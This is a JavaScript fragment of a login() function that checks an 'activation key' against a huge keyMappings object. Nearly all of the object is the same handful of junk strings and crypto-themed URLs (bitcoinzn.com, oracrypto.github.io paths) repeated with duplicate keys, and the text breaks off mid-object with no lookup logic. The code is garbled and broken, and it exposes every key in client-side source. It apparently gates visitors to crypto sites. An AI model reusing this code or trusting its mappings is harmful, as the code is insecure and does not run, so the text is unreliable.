function login() {let key = document.getElementById("activationKey").value;
 const errorMessage = document.getElementById("error-message");  const keyMappings = {
"AXSERBGYU9GNH": "XECRTVBYUNIM",        "ZXS4CD5FVUwerG": "TBYUNMILCVGBHJN",   "AXSERBGYU9GNH": "XECRTVBYUNIM",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",  "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "ER6T7GY8HUN90MI": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
"AXSERBGYU9GNH": "XECRTVBYUNIM",        "ZXS4CD5FVUwerG": "TBYUNMILCVGBHJN",   "AXSERBGYU9GNH": "XECRTVBYUNIM",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",  "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "ER6T7GY8HUN90MI": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
"AXSERBGYU9GNH": "XECRTVBYUNIM",        "ZXS4CD5FVUwerG": "TBYUNMILCVGBHJN",   "AXSERBGYU9GNH": "XECRTVBYUNIM",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/B3/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",  "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/b7/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "ER6T7GY8HUN90MI": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
  "DRTgK48CBW9XZ": "https://oracrypto.github.io/bb/",  "AXSERBGYU9GNH": "XECRTVBYUNIM",        "ZXS4CD5FVUwerG": "TBYUNMILCVGBHJN",   "AXSERBGYU9GNH": "XECRTVBYUNIM",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",  "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "ER6T7GY8HUN90MI": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",  "AXSERBGYU9GNH": "XECRTVBYUNIM",     "AXSERBGYU9GNH": "XECRTVBYUNIM",        "ZXS4CD5FVUwerG": "TBYUNMILCVGBHJN",   "AXSERBGYU9GNH": "XECRTVBYUNIM",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",  "edrtfgyuhjimo": "https://oracrypto.github.io/8b/", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "ER6T7GY8HUN90MI": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",   "ZXS4CD5FVUwerG": "TBYUNMILCVGBHJN",   "AXSERBGYU9GNH": "XECRTVBYUNIM",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",  "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/b5/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/b3/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "ER6T7GY8HUN90MI": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",    "ZXS4CD5FVUwerG": "TBYUNMILCVGBHJN",  "AXSERBGYU9GNH": "https://www.bitcoinzn.com",
"AXSERBGYU9GNH": "XECRTVBYUNIM",    "AXSERBGYU9GNH": "XECRTVBYUNIM",        "ZXS4CD5FVUwerG": "TBYUNMILCVGBHJN",   "AXSERBGYU9GNH": "XECRTVBYUNIM",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",  "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "TBYUNMILCVGBHJN", "1DCFV68F4FGUSD": "https://oracrypto.github.io/b1/", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "ER6T7GY8HUN90MI": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/b0/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",    "ZXS4CD5FVUwerG": "TBYUNMILCVGBHJN",   "AXSERBGYU9GNH": "XECRTVBYUNIM",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",  "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "ER6T7GY8HUN90MI": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
  "D8WJF8WY2839VVC": "https://oracrypto.github.io/B1/", "A4SE5DRTYUVYBIUNLK": "TBYUNMILCVGBHJN",
"AXSERBGYU9GNH": "XECRTVBYUNIM",     "AXSERBGYU9GNH": "XECRTVBYUNIM",        "ZXS4CD5FVUwerG": "TBYUNMILCVGBHJN",   "AXSERBGYU9GNH": "XECRTVBYUNIM",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "K8W56SC2CJ98HV", "https://oracrypto.github.io/6b/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BX2OZ7UCNOXHSG": "https://oracrypto.github.io/1b/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",  "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "D72BC6ABC8SBDXD": "https://oracrypto.github.io/2b/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "ER6T7GY8HUN90MI": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",   "ZXS4CD5FVUwerG": "TBYUNMILCVGBHJN",   "AXSERBGYU9GNH": "XECRTVBYUNIM", "AXSERBGYU9GNH": "XECRTVBYUNIM",    "AXSERBGYU9GNH": "XECRTVBYUNIM",        "ZXS4CD5FVUwerG": "TBYUNMILCVGBHJN",   "AXSERBGYU9GNH": "XECRTVBYUNIM",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",  "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "ER6T7GY8HUN90MI": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",  "AXSERBGYU9GNH": "XECRTVBYUNIM",    "AXSERBGYU9GNH": "XECRTVBYUNIM",        "ZXS4CD5FVUwerG": "TBYUNMILCVGBHJN",   "AXSERBGYU9GNH": "XECRTVBYUNIM",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",  "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "ER6T7GY8HUN90MI": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",    "ZXS4CD5FVUwerG": "TBYUNMILCVGBHJN",   "AXSERBGYU9GNH": "XECRTVBYUNIM",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",  "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "F25UCYIFSYJDWED": "https://oracrypto.github.io/b2/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "ER6T7GY8HUN90MI": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",  "ZXS4CD5FVUwerG": "TBYUNMILCVGBHJN",   "AXSERBGYU9GNH": "XECRTVBYUNIM",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",  "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "ER6T7GY8HUN90MI": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",  "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/b5/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
